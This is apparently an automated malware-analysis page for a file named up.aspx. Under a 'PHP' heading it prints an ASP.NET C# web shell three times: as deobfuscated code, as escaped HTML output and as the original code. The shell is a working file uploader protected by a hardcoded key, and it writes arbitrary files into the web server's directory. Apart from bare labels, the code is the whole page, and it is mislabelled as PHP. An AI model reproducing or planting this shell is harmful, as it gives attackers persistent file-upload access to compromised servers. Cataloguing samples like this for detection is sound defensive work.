PHP Malware Analysis

up.aspx

md5: c4b937dfa42d89ed30d79a7670689fcc

Jump to:

Screenshot


Attributes

Title

URLs


Deobfuscated PHP code

<%@ Page Language="C#" %>
<%@ Import Namespace="System.IO" %>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<script runat="server">
    private const string AUTHKEY = "woanware";
    private const string HEADER = "<html>\n<head>\n<title>filesystembrowser</title>\n<style type=\"text/css\"><!--\nbody,table,p,pre,form input,form select {\n font-family: \"Lucida Console\", monospace;\n font-size: 88%;\n}\n-->\n</style></head>\n<body>\n";
    private const string FOOTER = "</body>\n</html>\n";

    /// <summary>
    /// 
    /// </summary>
    /// <param name="sender"></param>
    /// <param name="e"></param>
    protected void Page_Load(object sender, EventArgs e)
    {
        try
        {
            if (Request.Params["authkey"] == null)
            {
                Response.Write(HEADER);
                Response.Write(this.GetUploadControls());
                Response.Write(FOOTER);
                return;
            }

            if (Request.Params["authkey"] != AUTHKEY)
            {
                Response.Write(HEADER);
                Response.Write(this.GetUploadControls());
                Response.Write(FOOTER);
                return;
            }
            
            if (Request.Params["operation"] != null)
            {
                if (Request.Params["operation"] == "upload")
                {
                    Response.Write(HEADER);
                    Response.Write(this.UploadFile());
                    Response.Write(FOOTER);
                }
                else
                {
                    Response.Write(HEADER);
                    Response.Write("Unknown operation");
                    Response.Write(FOOTER);
                }
            }
            else
            {
                Response.Write(HEADER);
                Response.Write(this.GetUploadControls());
                Response.Write(FOOTER);
            }
        }
        catch (Exception ex)
        {
            Response.Write(HEADER);
            Response.Write(ex.Message);
            Response.Write(FOOTER);
        }
    }

    /// <summary>
    /// 
    /// </summary>
    private string UploadFile()
    {
        try
        {
            if (Request.Params["authkey"] == null)
            {
                return string.Empty;
            }

            if (Request.Params["authkey"] != AUTHKEY)
            {
                return string.Empty;
            }
            
            if (Request.Files.Count != 1)
            {
                return "No file selected";
            }

            HttpPostedFile httpPostedFile = Request.Files[0];

            int fileLength = httpPostedFile.ContentLength;
            byte[] buffer = new byte[fileLength];
            httpPostedFile.InputStream.Read(buffer, 0, fileLength);

            FileInfo fileInfo = new FileInfo(Request.PhysicalPath);
            using (FileStream fileStream = new FileStream(Path.Combine(fileInfo.DirectoryName, Path.GetFileName(httpPostedFile.FileName)), FileMode.Create))
            {
                fileStream.Write(buffer, 0, buffer.Length);
            }

            return "File uploaded";
        }
        catch (Exception ex)
        {
            return ex.ToString();
        }
    }

    /// <summary>
    /// 
    /// </summary>
    /// <returns></returns>
    private string GetUploadControls()
    {
        string temp = string.Empty;

        temp = "<form enctype=\"multipart/form-data\" action=\"?operation=upload\" method=\"post\">";
        temp += "<br>Auth Key: <input type=\"text\" name=\"authKey\"><br>";
        temp += "<br>Please specify a file: <input type=\"file\" name=\"file\"></br>";
        temp += "<div><input type=\"submit\" value=\"Send\"></div>";
        temp += "</form>";

        return temp;
    }
</script>

<!-- Created by Mark Woan (http://www.woanware.co.uk) -->

Execution traces


Generated HTML code

<html><head><meta name="color-scheme" content="light dark"></head><body><pre style="word-wrap: break-word; white-space: pre-wrap;">&lt;%@ Page Language="C#" %&gt;
&lt;%@ Import Namespace="System.IO" %&gt;

&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt;

&lt;script runat="server"&gt;
    private const string AUTHKEY = "woanware";
    private const string HEADER = "&lt;html&gt;\n&lt;head&gt;\n&lt;title&gt;filesystembrowser&lt;/title&gt;\n&lt;style type=\"text/css\"&gt;&lt;!--\nbody,table,p,pre,form input,form select {\n font-family: \"Lucida Console\", monospace;\n font-size: 88%;\n}\n--&gt;\n&lt;/style&gt;&lt;/head&gt;\n&lt;body&gt;\n";
    private const string FOOTER = "&lt;/body&gt;\n&lt;/html&gt;\n";

    /// &lt;summary&gt;
    /// 
    /// &lt;/summary&gt;
    /// &lt;param name="sender"&gt;&lt;/param&gt;
    /// &lt;param name="e"&gt;&lt;/param&gt;
    protected void Page_Load(object sender, EventArgs e)
    {
        try
        {
            if (Request.Params["authkey"] == null)
            {
                Response.Write(HEADER);
                Response.Write(this.GetUploadControls());
                Response.Write(FOOTER);
                return;
            }

            if (Request.Params["authkey"] != AUTHKEY)
            {
                Response.Write(HEADER);
                Response.Write(this.GetUploadControls());
                Response.Write(FOOTER);
                return;
            }
            
            if (Request.Params["operation"] != null)
            {
                if (Request.Params["operation"] == "upload")
                {
                    Response.Write(HEADER);
                    Response.Write(this.UploadFile());
                    Response.Write(FOOTER);
                }
                else
                {
                    Response.Write(HEADER);
                    Response.Write("Unknown operation");
                    Response.Write(FOOTER);
                }
            }
            else
            {
                Response.Write(HEADER);
                Response.Write(this.GetUploadControls());
                Response.Write(FOOTER);
            }
        }
        catch (Exception ex)
        {
            Response.Write(HEADER);
            Response.Write(ex.Message);
            Response.Write(FOOTER);
        }
    }

    /// &lt;summary&gt;
    /// 
    /// &lt;/summary&gt;
    private string UploadFile()
    {
        try
        {
            if (Request.Params["authkey"] == null)
            {
                return string.Empty;
            }

            if (Request.Params["authkey"] != AUTHKEY)
            {
                return string.Empty;
            }
            
            if (Request.Files.Count != 1)
            {
                return "No file selected";
            }

            HttpPostedFile httpPostedFile = Request.Files[0];

            int fileLength = httpPostedFile.ContentLength;
            byte[] buffer = new byte[fileLength];
            httpPostedFile.InputStream.Read(buffer, 0, fileLength);

            FileInfo fileInfo = new FileInfo(Request.PhysicalPath);
            using (FileStream fileStream = new FileStream(Path.Combine(fileInfo.DirectoryName, Path.GetFileName(httpPostedFile.FileName)), FileMode.Create))
            {
                fileStream.Write(buffer, 0, buffer.Length);
            }

            return "File uploaded";
        }
        catch (Exception ex)
        {
            return ex.ToString();
        }
    }

    /// &lt;summary&gt;
    /// 
    /// &lt;/summary&gt;
    /// &lt;returns&gt;&lt;/returns&gt;
    private string GetUploadControls()
    {
        string temp = string.Empty;

        temp = "&lt;form enctype=\"multipart/form-data\" action=\"?operation=upload\" method=\"post\"&gt;";
        temp += "&lt;br&gt;Auth Key: &lt;input type=\"text\" name=\"authKey\"&gt;&lt;br&gt;";
        temp += "&lt;br&gt;Please specify a file: &lt;input type=\"file\" name=\"file\"&gt;&lt;/br&gt;";
        temp += "&lt;div&gt;&lt;input type=\"submit\" value=\"Send\"&gt;&lt;/div&gt;";
        temp += "&lt;/form&gt;";

        return temp;
    }
&lt;/script&gt;

&lt;!-- Created by Mark Woan (http://www.woanware.co.uk) --&gt;
</pre></body></html>

Original PHP code

<%@ Page Language="C#" %>
<%@ Import Namespace="System.IO" %>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<script runat="server">
    private const string AUTHKEY = "woanware";
    private const string HEADER = "<html>\n<head>\n<title>filesystembrowser</title>\n<style type=\"text/css\"><!--\nbody,table,p,pre,form input,form select {\n font-family: \"Lucida Console\", monospace;\n font-size: 88%;\n}\n-->\n</style></head>\n<body>\n";
    private const string FOOTER = "</body>\n</html>\n";

    /// <summary>
    /// 
    /// </summary>
    /// <param name="sender"></param>
    /// <param name="e"></param>
    protected void Page_Load(object sender, EventArgs e)
    {
        try
        {
            if (Request.Params["authkey"] == null)
            {
                Response.Write(HEADER);
                Response.Write(this.GetUploadControls());
                Response.Write(FOOTER);
                return;
            }

            if (Request.Params["authkey"] != AUTHKEY)
            {
                Response.Write(HEADER);
                Response.Write(this.GetUploadControls());
                Response.Write(FOOTER);
                return;
            }
            
            if (Request.Params["operation"] != null)
            {
                if (Request.Params["operation"] == "upload")
                {
                    Response.Write(HEADER);
                    Response.Write(this.UploadFile());
                    Response.Write(FOOTER);
                }
                else
                {
                    Response.Write(HEADER);
                    Response.Write("Unknown operation");
                    Response.Write(FOOTER);
                }
            }
            else
            {
                Response.Write(HEADER);
                Response.Write(this.GetUploadControls());
                Response.Write(FOOTER);
            }
        }
        catch (Exception ex)
        {
            Response.Write(HEADER);
            Response.Write(ex.Message);
            Response.Write(FOOTER);
        }
    }

    /// <summary>
    /// 
    /// </summary>
    private string UploadFile()
    {
        try
        {
            if (Request.Params["authkey"] == null)
            {
                return string.Empty;
            }

            if (Request.Params["authkey"] != AUTHKEY)
            {
                return string.Empty;
            }
            
            if (Request.Files.Count != 1)
            {
                return "No file selected";
            }

            HttpPostedFile httpPostedFile = Request.Files[0];

            int fileLength = httpPostedFile.ContentLength;
            byte[] buffer = new byte[fileLength];
            httpPostedFile.InputStream.Read(buffer, 0, fileLength);

            FileInfo fileInfo = new FileInfo(Request.PhysicalPath);
            using (FileStream fileStream = new FileStream(Path.Combine(fileInfo.DirectoryName, Path.GetFileName(httpPostedFile.FileName)), FileMode.Create))
            {
                fileStream.Write(buffer, 0, buffer.Length);
            }

            return "File uploaded";
        }
        catch (Exception ex)
        {
            return ex.ToString();
        }
    }

    /// <summary>
    /// 
    /// </summary>
    /// <returns></returns>
    private string GetUploadControls()
    {
        string temp = string.Empty;

        temp = "<form enctype=\"multipart/form-data\" action=\"?operation=upload\" method=\"post\">";
        temp += "<br>Auth Key: <input type=\"text\" name=\"authKey\"><br>";
        temp += "<br>Please specify a file: <input type=\"file\" name=\"file\"></br>";
        temp += "<div><input type=\"submit\" value=\"Send\"></div>";
        temp += "</form>";

        return temp;
    }
</script>

<!-- Created by Mark Woan (http://www.woanware.co.uk) -->